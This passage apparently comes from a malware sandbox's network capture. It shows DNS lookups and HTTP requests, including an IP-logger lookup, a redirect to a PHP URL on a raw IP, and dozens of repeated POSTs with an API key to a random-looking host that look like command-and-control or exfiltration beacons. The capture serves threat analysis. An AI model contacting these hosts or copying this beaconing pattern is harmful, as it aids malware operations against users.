Location: https://186.2.171.3/seemorebty/il.php?e=md9_1sjm
Content-Type: text/html; charset=utf8
Content-Length: 568
-
Remote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A172.67.132.113iplogger.orgIN A104.21.4.208
-
Remote address:8.8.8.8:53Request3.171.2.186.in-addr.arpaIN PTRResponse3.171.2.186.in-addr.arpaIN PTR12by12ltd
-
Remote address:8.8.8.8:53Request3.171.2.186.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request201.178.17.96.in-addr.arpaIN PTRResponse201.178.17.96.in-addr.arpaIN PTRa96-17-178-201deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request201.178.17.96.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request201.178.17.96.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request9.228.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestx2.i.lencr.orgIN AResponsex2.i.lencr.orgIN CNAMEcrl.root-x1.letsencrypt.org.edgekey.netcrl.root-x1.letsencrypt.org.edgekey.netIN CNAMEe8652.dscx.akamaiedge.nete8652.dscx.akamaiedge.netIN A173.222.13.40
-
Remote address:8.8.8.8:53Requestx2.i.lencr.orgIN A
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A163.70.147.35
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN A
-
Remote address:173.222.13.40:80RequestGET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.i.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-cert
Last-Modified: Fri, 04 Aug 2023 20:57:55 GMT
ETag: "64cd6653-464"
Content-Disposition: attachment; filename="ISRG Root X2 signed by ISRG Root X1.der"
Cache-Control: max-age=3600
Expires: Sat, 30 Dec 2023 18:50:50 GMT
Date: Sat, 30 Dec 2023 17:50:50 GMT
Content-Length: 1124
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestx2.c.lencr.orgIN AResponsex2.c.lencr.orgIN CNAMEcrl.root-x1.letsencrypt.org.edgekey.netcrl.root-x1.letsencrypt.org.edgekey.netIN CNAMEe8652.dscx.akamaiedge.nete8652.dscx.akamaiedge.netIN A173.222.13.40
-
Remote address:8.8.8.8:53Request40.13.222.173.in-addr.arpaIN PTRResponse40.13.222.173.in-addr.arpaIN PTRa173-222-13-40deploystaticakamaitechnologiescom
-
Remote address:173.222.13.40:80RequestGET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.c.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
ETag: "64cd6654-12c"
Cache-Control: max-age=3600
Expires: Sat, 30 Dec 2023 18:50:52 GMT
Date: Sat, 30 Dec 2023 17:50:52 GMT
Content-Length: 300
Connection: keep-alive
-
Remote address:8.8.8.8:53Requeste1.o.lencr.orgIN AResponsee1.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A96.17.179.201a1887.dscq.akamai.netIN A96.17.179.193
-
GEThttp://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3DRemote address:96.17.179.201:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e1.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 344
ETag: "5D4309E645E1EFB3642887E5D6D83EAE0DE237FA328BF057983BA457E59206E0"
Last-Modified: Sat, 30 Dec 2023 05:10:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16451
Expires: Sat, 30 Dec 2023 22:25:04 GMT
Date: Sat, 30 Dec 2023 17:50:53 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Request35.147.70.163.in-addr.arpaIN PTRResponse35.147.70.163.in-addr.arpaIN PTRedge-star-mini-shv-01-lhr6facebookcom
-
Remote address:8.8.8.8:53Request201.179.17.96.in-addr.arpaIN PTRResponse201.179.17.96.in-addr.arpaIN PTRa96-17-179-201deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request50.23.12.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requesthumisnee.comIN AResponsehumisnee.comIN A185.107.56.199
-
Remote address:8.8.8.8:53Requestsurvey-smiles.comIN AResponsesurvey-smiles.comIN A199.59.243.225
-
Remote address:199.59.243.225:80RequestGET / HTTP/1.1
Host: survey-smiles.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 85fc9a3a-adb6-476a-8080-f978e07b795b
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GSbXHjSyM4GBXh+TDdQi5Ch6arC3xeKj8KkRwOq4qrqrlRcvBA0AmkBJ57Iam4tUGtRHYm5e3uPQsAB9Z6SRbg==
set-cookie: parking_session=85fc9a3a-adb6-476a-8080-f978e07b795b; expires=Sat, 30 Dec 2023 18:05:58 GMT; path=/
-
Remote address:8.8.8.8:53Request199.56.107.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request167.109.18.2.in-addr.arpaIN PTRResponse167.109.18.2.in-addr.arpaIN PTRa2-18-109-167deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestuehge4g6gh.2ihsfa.comIN AResponseuehge4g6gh.2ihsfa.comIN A13.248.169.48uehge4g6gh.2ihsfa.comIN A76.223.54.146
-
Remote address:13.248.169.48:80RequestGET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 200 OK
Date: Sat, 30 Dec 2023 17:51:03 GMT
Content-Type: text/html
Content-Length: 12976
Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT
Connection: keep-alive
ETag: "657a13bf-32b0"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_KaWOJxVo1Wxbcc+AjlokCvPHAVfk+7HAYX4W8r0yTBJuGZf5J86jQ7CZXWc9nzXAYq697W9ZN7boIHgI7mUlIQ
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=89.149.23.59;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:07 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:07 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:07 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address:13.248.169.48:80RequestPOST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
ResponseHTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:10 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
